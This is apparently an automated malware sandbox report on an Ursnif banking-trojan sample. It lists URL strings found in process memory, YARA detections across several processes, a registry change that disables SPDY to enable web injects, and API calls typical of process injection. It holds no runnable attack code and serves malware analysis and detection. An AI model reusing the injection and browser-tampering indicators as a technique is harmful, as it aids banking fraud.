            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
            Source: msapplication.xml.13.drString found in binary or memory: http://www.amazon.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.de/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.559261545.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.ask.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
            Source: explorer.exe, 0000001D.00000000.557748192.0000000007CC8000.00000004.00000001.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
            Source: RuntimeBroker.exe, 00000025.00000002.622923485.00000257BD042000.00000004.00000001.sdmpString found in binary or memory: http://www.autoitscript.com/favicon.ico
            Source: RuntimeBroker.exe, 00000025.00000002.622923485.00000257BD042000.00000004.00000001.sdmpString found in binary or memory: http://www.autoitscript.com/site/autoit/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.baidu.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.559261545.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.cjmall.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.cnet.co.uk/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.docUrl.com/bar.htm
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.excite.co.jp/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.559261545.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: explorer.exe, 0000001D.00000000.559261545.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: explorer.exe, 0000001D.00000000.559261545.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: explorer.exe, 0000001D.00000000.559261545.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: explorer.exe, 0000001D.00000000.559261545.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
            Source: explorer.exe, 0000001D.00000000.559261545.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: explorer.exe, 0000001D.00000000.559261545.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: explorer.exe, 0000001D.00000000.559261545.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: explorer.exe, 0000001D.00000000.559261545.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
            Source: explorer.exe, 0000001D.00000000.559261545.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: explorer.exe, 0000001D.00000000.559261545.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: explorer.exe, 0000001D.00000000.559261545.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: explorer.exe, 0000001D.00000000.559261545.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: explorer.exe, 0000001D.00000000.559261545.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.gismeteo.ru/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/favicon.ico
            Source: explorer.exe, 0000001D.00000000.559261545.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.in/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.jp/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.uk/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.br/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.sa/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.tw/
            Source: msapplication.xml2.13.drString found in binary or memory: http://www.google.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.google.cz/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.google.de/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.google.es/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.google.fr/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.google.it/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.google.pl/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.google.ru/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.google.si/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.iask.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.iask.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.559261545.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.linternaute.com/favicon.ico
            Source: msapplication.xml3.13.drString found in binary or memory: http://www.live.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.maktoob.com/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.mtv.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.mtv.com/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.myspace.com/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.najdi.si/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.najdi.si/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.nate.com/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.neckermann.de/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.neckermann.de/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.news.com.au/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.nifty.com/favicon.ico
            Source: msapplication.xml4.13.drString found in binary or memory: http://www.nytimes.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.ocn.ne.jp/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.orange.fr/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.otto.de/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.ozon.ru/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.ozon.ru/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.ozu.es/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.pchome.com.tw/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.priceminister.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.priceminister.com/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.rakuten.co.jp/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.rambler.ru/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.rambler.ru/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.recherche.aol.fr/
            Source: msapplication.xml5.13.drString found in binary or memory: http://www.reddit.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.rtl.de/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.rtl.de/favicon.ico
            Source: explorer.exe, 0000001D.00000000.559261545.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: explorer.exe, 0000001D.00000000.559261545.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
            Source: explorer.exe, 0000001D.00000000.559261545.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.servicios.clarin.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.shopzilla.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.sify.com/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.sogou.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.sogou.com/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.soso.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.soso.com/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.t-online.de/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.taobao.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.taobao.com/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.target.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.target.com/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.tchibo.de/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.tchibo.de/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.tesco.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.tesco.com/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
            Source: explorer.exe, 0000001D.00000000.559261545.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.tiscali.it/favicon.ico
            Source: msapplication.xml6.13.drString found in binary or memory: http://www.twitter.com/
            Source: explorer.exe, 0000001D.00000000.559261545.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.univision.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.univision.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.559261545.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.walmart.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.walmart.com/favicon.ico
            Source: msapplication.xml7.13.drString found in binary or memory: http://www.wikipedia.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.ya.com/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.yam.com/favicon.ico
            Source: msapplication.xml8.13.drString found in binary or memory: http://www.youtube.com/
            Source: explorer.exe, 0000001D.00000000.559261545.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www3.fnac.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www3.fnac.com/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://z.about.com/m/a08.ico

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 0000001E.00000003.563919283.000001C3E6640000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.491933898.0000000005A98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.555836306.0000000004C60000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000002.627702451.000001E98B13E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.491904248.0000000005A98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.568586726.0000000005F20000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.492017144.0000000005A98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000002.637761325.0000000004D1E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000002.579706123.000000000051E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000020.00000002.580157603.000001B5767DE000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.491990075.0000000005A98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.492004462.0000000005A98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.498916612.000000000591B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000003.574197225.00000000028F0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000002.625989422.000001357695E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.491965046.0000000005A98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000002.627966819.00000257BF38E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.491881653.0000000005A98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000020.00000003.579141799.000001B576620000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.491855597.0000000005A98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3508, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4600, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4292, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5436, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: control.exe PID: 632, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 3756, type: MEMORY

            E-Banking Fraud:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 0000001E.00000003.563919283.000001C3E6640000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.491933898.0000000005A98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.555836306.0000000004C60000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000002.627702451.000001E98B13E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.491904248.0000000005A98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.568586726.0000000005F20000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.492017144.0000000005A98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000002.637761325.0000000004D1E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000002.579706123.000000000051E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000020.00000002.580157603.000001B5767DE000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.491990075.0000000005A98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.492004462.0000000005A98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.498916612.000000000591B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000003.574197225.00000000028F0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000002.625989422.000001357695E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.491965046.0000000005A98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000002.627966819.00000257BF38E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.491881653.0000000005A98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000020.00000003.579141799.000001B576620000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.491855597.0000000005A98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3508, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4600, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4292, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5436, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: control.exe PID: 632, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 3756, type: MEMORY
            Disables SPDY (HTTP compression, likely to perform web injects)Show sources
            Source: C:\Windows\explorer.exeRegistry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

            System Summary:

            barindex
            Source: C:\Windows\explorer.exeCode function: 29_2_04CE4674 NtQuerySystemInformation,29_2_04CE4674
            Source: C:\Windows\explorer.exeCode function: 29_2_04CE33F8 NtQueryInformationProcess,29_2_04CE33F8
            Source: C:\Windows\System32\control.exeCode function: 30_2_004E68E0 NtReadVirtualMemory,30_2_004E68E0
            Source: C:\Windows\System32\control.exeCode function: 30_2_004F70B8 NtMapViewOfSection,30_2_004F70B8
            Source: C:\Windows\System32\control.exeCode function: 30_2_004F1154 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification,FindCloseChangeNotification,30_2_004F1154
            Source: C:\Windows\System32\control.exeCode function: 30_2_005029D0 NtAllocateVirtualMemory,30_2_005029D0
            Source: C:\Windows\System32\control.exeCode function: 30_2_004EC188 RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose,30_2_004EC188
            Source: C:\Windows\System32\control.exeCode function: 30_2_004F9B08 NtCreateSection,30_2_004F9B08
            Source: C:\Windows\System32\control.exeCode function: 30_2_004E33F8 NtQueryInformationProcess,30_2_004E33F8
            Source: C:\Windows\System32\control.exeCode function: 30_2_004E2CC0 NtQueryInformationProcess,30_2_004E2CC0
            Source: C:\Windows\System32\control.exeCode function: 30_2_004E7F44 NtWriteVirtualMemory,30_2_004E7F44
            Source: C:\Windows\System32\control.exeCode function: 30_2_004F6F64 NtQueryInformationToken,NtQueryInformationToken,NtClose,NtClose,30_2_004F6F64
            Source: C:\Windows\System32\control.exeCode function: 30_2_00521003 NtProtectVirtualMemory,NtProtectVirtualMemory,30_2_00521003
